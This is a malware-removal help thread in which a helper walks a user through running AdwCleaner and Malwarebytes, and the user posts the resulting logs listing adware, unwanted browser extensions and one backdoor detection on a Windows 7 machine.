FF - prefs.js: network.proxy.type - 0
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{01d7c86a-b746-4647-afed-d88f7528f044} - c:\program files\MediaWatchV1\MediaWatchV1home1288\ie\MediaWatchV1home1288.dll
BHO-{6edc79e0-4d6f-4de7-be61-f8e9bc80fd50} - c:\program files\MediaViewerV1\MediaViewerV1alpha442\ie\MediaViewerV1alpha442.dll
BHO-{d0c64ff5-c2d4-4f66-9fa3-69d4846db615} - c:\program files\MediaBuzzV1\MediaBuzzV1mode6898\ie\MediaBuzzV1mode6898.dll
BHO-{d6f31e2c-0a30-4b60-a44c-141aa27478d4} - c:\program files\MediaViewV1\MediaViewV1alpha678\ie\MediaViewV1alpha678.dll
BHO-{df68ab54-afc1-4005-aa2f-6a6ae5d2dea0} - c:\program files\MediaPlayerV1\MediaPlayerV1alpha583\ie\MediaPlayerV1alpha583.dll
BHO-{f9aaacf6-0ca0-4ff4-8f71-d935d2eb86fd} - c:\program files\RichMediaViewV1\RichMediaViewV1release335\ie\RichMediaViewV1release335.dll
Toolbar-10 - (no file)
Toolbar-!{687578b9-7132-4a7a-80e4-30ee31099e03} - (no file)
ShellIconOverlayIdentifiers-{472083B0-C522-11CF-8763-00608CC02F24} - (no file)
SafeBoot-98891617.sys
MSConfigStartUp-Facebook Update - c:\users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe
MSConfigStartUp-googletalk - c:\users\User\AppData\Roaming\Google\Google Talk\googletalk.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\postgresql-9.2]
"ImagePath"="C:/Program Files/PostgreSQL/9.2/bin/pg_ctl.exe runservice -N \"postgresql-9.2\" -D \"C:/Program Files/PostgreSQL/9.2/data\" -w"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\postgresql-9.2]
"ImagePath"="C:/Program Files/PostgreSQL/9.2/bin/pg_ctl.exe runservice -N \"postgresql-9.2\" -D \"C:/Program Files/PostgreSQL/9.2/data\" -w"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*A*x*i*x*碍8\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*L*e*m*o*2痃0*・eating demux: access='file' demux='' path='c:\users\User\Downloads\Ant Videos\youtube.com.Arigatou - Kokia - YouTube.flv'*]
@Class="Shell"
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*L*e*m*o*2痃0*・eating demux: access='file' demux='' path='c:\users\User\Downloads\Ant Videos\youtube.com.Arigatou - Kokia - YouTube.flv'*\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*L*e*m*o*wh0@\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*L*e*m*o*q勛aQ*utube.com.Arigatou%20-%20Kokia%20-%20YouTube.flv*a\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'Explorer.exe'(3976)
c:\program files\WordWeb\WHook.dll
.
Completion time: 2014-08-05  11:41:17
ComboFix-quarantined-files.txt  2014-08-05 05:56
.
Pre-Run: 44,740,022,272 bytes free
Post-Run: 44,633,104,384 bytes free
.
- - End Of File - - 4BEA95B7165F37B35F86D001BD61DA55
A36C5E4F47E84449FF07ED3517B43A31


Now eagerly waiting for your next reply. :) Hope I can have a way out of it.

-justBee-

#8 xXToffeeXx

    Bleepin' Polar Bear

  • Malware Response Instructor
  • 6,079 posts
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:05:54 AM

Posted 05 August 2014 - 06:37 AM

Hi jsutbee,

Please download AdwCleaner by Xplode and save to your Desktop.

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin... be patient, as the scan may take some time to complete.
  • Click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

--------------

Please download Malwarebytes Anti-Malware to your desktop.

  • Double-click mb3-setup-1878.1878-3.5.1.2522.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When completed click the down arrow on Export Log and select Text file (*.txt)
  • Save the file to your desktop as MBAM
  • Exit the program without taking any action.
  • Copy and paste the contents of MBAM.txt in your reply

--------------

To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • AdwCleaner log
  • MBAM.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

~Twitter~ | ~Malware Analyst at Emsisoft~


#9 jsutbee

  • Topic Starter
  • Members
  • 21 posts
  • Local time:11:39 AM

Posted 06 August 2014 - 04:35 AM

Hi Toffee,

Here's my log from AdwCleaner[S2]:

-----------------------------------------------------

# AdwCleaner v3.302 - Report created 06/08/2014 at 14:28:30
# Updated 30/07/2014 by Xplode
# Operating System : Windows 7 Ultimate  (32 bits)
# Username : User - BIKASH
# Running from : C:\Users\User\Desktop\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\ProgramData\AVG Secure Search
Folder Deleted : C:\ProgramData\AVG Security Toolbar
Folder Deleted : C:\Program Files\Common Files\AVG Secure Search
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Classes\AppID\ViProtocol.DLL
Key Deleted : HKLM\SOFTWARE\Classes\protocols\handler\viprotocol
Key Deleted : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi
Key Deleted : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi.1
Key Deleted : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE
Key Deleted : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE.1
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\avg-secure-search-installer_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\avg-secure-search-installer_RASMANCS
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [vProt]
Key Deleted : HKLM\SOFTWARE\MozillaPlugins\@avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{1FDFF5A2-7BB1-48E1-8081-7236812B12B2}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16421
 
 
-\\ Mozilla Firefox v29.0 (en-US)
 
[ File : C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\prefs.js ]
 
Line Deleted : user_pref("extensions.aRNEOMVW50611856ZKVKQ22976610com61908.61908.internaldb.monetization_plugin_bundledUrls.value", "%7B%22dealply_s%22%3A%7B%22urls%22%3A%5B%22ssfiles.com%22%5D%7D%2C%22dealply_p%22%[...]
Line Deleted : user_pref("extensions.crossrider.bic", "1479034d316ce3ccaedb831909733ee9");
 
[ File : C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\extensions\prefs.js ]
 
 
-\\ Google Chrome v36.0.1985.125
 
[ File : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Deleted [Extension] : ndibdjnfmopecpmkdieinmbadjfpblof
 
*************************
 
AdwCleaner[R0].txt - [25331 octets] - [30/07/2014 16:01:56]
AdwCleaner[R1].txt - [1138 octets] - [31/07/2014 10:16:57]
AdwCleaner[R2].txt - [3503 octets] - [06/08/2014 10:18:27]
AdwCleaner[R3].txt - [3536 octets] - [06/08/2014 14:26:29]
AdwCleaner[S0].txt - [25587 octets] - [30/07/2014 16:25:18]
AdwCleaner[S1].txt - [1200 octets] - [31/07/2014 10:18:35]
AdwCleaner[S2].txt - [3511 octets] - [06/08/2014 14:28:30]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [3571 octets] ##########
 
And here is my next MBAM log, from the MBAM.txt that I exported:
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/6/2014
Scan Time: 3:04:28 PM
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.08.06.02
Rootkit Database: v2014.08.04.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7
CPU: x86
File System: NTFS
User: User
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 420307
Time Elapsed: 10 min, 17 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 11
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\CLSID\{9BB812EA-6A11-4F94-AE32-DB3FD45EC496}, , [94c6279cadce5dd970c0fea2de2431cf], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{66B51873-B53D-42EC-BC1A-862EB4DB041D}, , [94c6279cadce5dd970c0fea2de2431cf], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{D01C1E11-ED7A-4791-8408-E63EECDA48FF}, , [94c6279cadce5dd970c0fea2de2431cf], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{5C6B193D-C4D0-4A0C-8509-8EA566380A7C}, , [5802f4cf98e36bcb1b17564a13efe61a], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\TypeLib\{BDB0F124-48E8-43A5-A263-45A7093CF058}, , [70eab21183f81e183200752b03ffbf41], 
PUP.Optional.RichMediaView.A, HKLM\SOFTWARE\RichMediaViewV1release335, , [42185f6491eaa88ee4d4f3f26c96847c], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\kbanbanalocifhgjcppngcdgminjckhm, , [c496fdc6daa159dd9a035d7d679b1de3], 
PUP.Optional.uTorrentTB.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\pacgpkgadgmibnhpdidcnfafllnmeomc, , [372304bf1c5f55e1fe3eeb037f839967], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\ZIP ENHANCER, , [afabdae9d6a543f3debdf0ea40c252ae], 
PUP.Optional.PlusHD.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\HD-V1.9, , [aeac80431c5fd561ad8db42ce121956b], 
PUP.Optional.SavePass.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\SavePass, , [91c91ba86a11bd798451aa3e6a98cb35], 
 
Registry Values: 10
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@zipenhancer.com, C:\Program Files\AmiExt\ZipEnhancer\ff, , [32287152b0cbde584e4e6e6cfb076997]
PUP.Optional.WebExpEnhanced.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@WebexpEnhancedV1alpha26.net, C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha26\ff, , [2e2c2c97c3b8f73fe88c0fed6f93b947]
PUP.Optional.VideoPlayer.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@VideoPlayerV3beta10835.net, C:\Program Files\VideoPlayerV3\VideoPlayerV3beta10835\ff, , [d5858c37136865d154a5b042b949c53b]
PUP.Optional.MediaPlayerAlpha.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaPlayerV1alpha583.net, C:\Program Files\MediaPlayerV1\MediaPlayerV1alpha583\ff, , [6af0457e07747eb8e6e8837936cc31cf]
PUP.Optional.MediaViewer.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaViewerV1alpha442.net, C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ff, , [5cfedfe44d2e7cba171f0aeedd2553ad]
PUP.Optional.MediaView.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaViewV1alpha678.net, C:\Program Files\MediaViewV1\MediaViewV1alpha678\ff, , [1f3b467d7b00be781d6c698e847e1ee2]
PUP.Optional.MediaWatch.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaWatchV1home1288.net, C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ff, , [67f32c97502b4cea1fa5d55a3fc554ac]
PUP.Optional.MediaBuzz.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaBuzzV1mode6898.net, C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ff, , [d08ac6fd29526cca425d35b68f73ff01]
PUP.Optional.RichMediaView.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@RichMediaViewV1release335.net, C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ff, , [f466903386f579bd5f5800e58b77f808]
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\ZIP ENHANCER|Path, C:\Program Files\AmiExt\ZipEnhancer, , [afabdae9d6a543f3debdf0ea40c252ae]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 14
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config, , [5bfff4cfa5d6c86e1b28fcdce02224dc], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults\preferences, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale\en-US, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin, , [79e14d767cff2e08d130755b34ce07f9], 
 
Files: 119
PUP.Optional.Bandoo, C:\Users\User\Downloads\iLividSetup-r362-n-bc.exe, , [3f1b477caecd94a2e3d99c77d22fdb25], 
PUP.Optional.Amonetize, C:\Users\User\AppData\Local\1682\a19451.exe, , [59011aa97efd0b2b46aeaaf6837ec33d], 
Backdoor.IRCBot, C:\Users\User\AppData\Local\1682\a19451mgr.exe, , [67f3f2d1f28905317b125ac38a7759a7], 
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config\ver.xml, , [5bfff4cfa5d6c86e1b28fcdce02224dc], 
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config\uninstinethnfd.exe, , [5bfff4cfa5d6c86e1b28fcdce02224dc], 
PUP.Optional.MindSpark.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_radiorage.dl.tb.ask.com_0.localstorage, , [5406f2d167149b9bcb3742a85ca641bf], 
PUP.Optional.MindSpark.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_radiorage.dl.tb.ask.com_0.localstorage-journal, , [b9a1507353282214da289a50ed15b749], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome.manifest, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\install.rdf, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\3a198c50364e5de2a7b2256a2a71b8a2.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\4560a041a18e5c805686aca2fbbf7fac.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\aa62f988d870591179a338ca156cdc15.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\background.html, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\browser.xul, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\d3f3b4ca28206b48d6a5676ba7ba0c10.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\dialog.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\ef029b9a7e24e1a38853d7e5cf38c43b.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\fa2c47838609abcf29f7cdc8d7b8564c.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\ffCoreFilesIndex.txt, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\options.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\options.xul, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\search_dialog.xul, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\775b907e74651ad97a762623558b5cab.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\0c35837f9a11ea63529cc80cee467197.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\11fe0e663f6fb46289354ddc3fbefbd0.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\219bf4e6abfc1d5d6225552064590680.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\24e8e8f96bde5769fc6fca85d218a808.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\277c5ae40aecc6034a98d083cd558fc2.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\379326b295af3787ab8dfc2f0d5ee7c8.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\4423f19478213ffdfb956f0806330e92.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\4d9663a851b96485807749e976f70ef5.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\8c5f775b0beefb8ee4bf49ac7c7f742c.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\9765f2fc44bc0ea593d57f48c482d053.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\b81ef4f7ddb1fae1efda5bb85912ba27.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\be92fe0bb2acf264dd48214a61c22ce4.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\dbe5dedc6afbdc4734c2634e774a9516.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\e975e057c019d3a4bab75c3654ae0964.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\ff1376e0d31ad66e9ec20defbf442981.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\d30b8adc9983626b8df7e160b37ab0c2.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\152c606d278fe66645f007ac2ec8ebdb.js, , [79e14d767cff2e08d130755b34ce07f9], 
